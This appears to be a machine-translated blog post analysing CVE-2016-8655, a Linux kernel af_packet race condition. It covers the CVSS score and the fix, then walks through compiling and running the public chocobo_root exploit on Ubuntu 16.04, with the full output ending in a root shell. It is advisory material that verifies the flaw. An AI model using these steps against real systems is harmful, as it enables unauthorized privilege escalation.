Th12 302016
 

CVE-2016-8655

Overview

The net / packet / af_packet.c of Linux Kernel vulnerability of race condition, you can be promoted to root privileges from the general user privileges.

packet_set_ring is, when you create a ring buffer, if the version of the packet is a TPACKET_V3 initializes the structure timer_list. This value is, and then you set the version to TPACKET_V1 before packet_set_ring has finished calling the setsockopt, you can be the race by another thread. This problem leads to a use-after-free vulnerability of timer_list structure, it will lead to the result to gain root privileges. This vulnerability has been fixed by taking the lock_sock (SK) to packet_setsockopt when you change the version of the packet while the lock when the start of packet_set_ring.

CVSS v3

CVSS v3 Base Score 7.8 High
Vector CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Impact Score 5.9
Exploitability Score 1.8
Attack Vector (AV) Local
Attack Complexity (AC) Low
Privileges Required (PR) Low
User Interaction (UI) None
Scope (S) Unchanged
Confidentiality (C) High
Integrity (I) High
Availability (A) High

Solution, mitigation information

  • Upgrading to Linux Kernel 4.8.14 or higher

Affected software versions

  • Linux Kernel 4.8.13

Technical Details

Operation verification of Exploit

chocobo_root.c prepared compatible environment to

khanhnn@CVE-2016-8655 ~ $ sudo apt-get install linux-image-4.4.0-51-generic linux-headers-4.4.0-51-generic
khanhnn@CVE-2016-8655 ~ $ sudo apt-get remove linux-image-4.4.0-53-generic linux-headers-4.4.0-53-generic
khanhnn@CVE-2016-8655 ~ $ sudo reboot
khanhnn@CVE-2016-8655 ~ $ uname -a
Linux CVE-2016-8655.test 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
khanhnn@CVE-2016-8655 ~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial

Setting compile and file capabilities

khanhnn@CVE-2016-8655 ~ $ gcc chocobo_root.c -o chocobo_root -lpthread
khanhnn@CVE-2016-8655 ~ $ ls -l chocobo_root
khanhnn@CVE-2016-8655 ~ $ sudo apt-get install libcap2-bin
khanhnn@CVE-2016-8655 ~ $ sudo setcap cap_net_raw+ep /home/kosuke/chocobo_root
khanhnn@CVE-2016-8655 ~ $ getcap ./chocobo_root
./chocobo_root = cap_net_raw+ep

Run

khanhnn@CVE-2016-8655 ~ $ ./chocobo_root
linux AF_PACKET race condition exploit by rebel
kernel version: 4.4.0-51-generic #72
proc_dostring = 0xffffffff81088090
modprobe_path = 0xffffffff81e48f80
register_sysctl_table = 0xffffffff812879a0
set_memory_rw = 0xffffffff8106f320
exploit starting
making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 102949, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 122693, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 124639, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
vsyscall page altered!


stage 1 completed
registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 564981, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@CVE-2016-8655 ~ # id
uid=0(root) gid=0(root) groups=0(root),1001(kosuke)

Summary

As there was a hole that you can enter the service, there is likely to be taken to root in the authority file with cap_net_raw capability, or by if this vulnerability long as it can change the behavior of the process.

Sources of information necessary to track

references

  • http://securityaffairs.co/wordpress/54168/hacking/cve-2016-8655-linux-kernel.html
  • http://seclists.org/oss-sec/2016/q4/607
  • https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c
  • http://jvndb.jvn.jp/ja/contents/2016/JVNDB-2016-006125.html
  • https://wiki.archlinuxjp.org/index.php/%E3%82%B1%E3%82%A4%E3%83%91%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3
  • http://www.vagrantbox.es/
 Posted by at 10:16 sáng

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)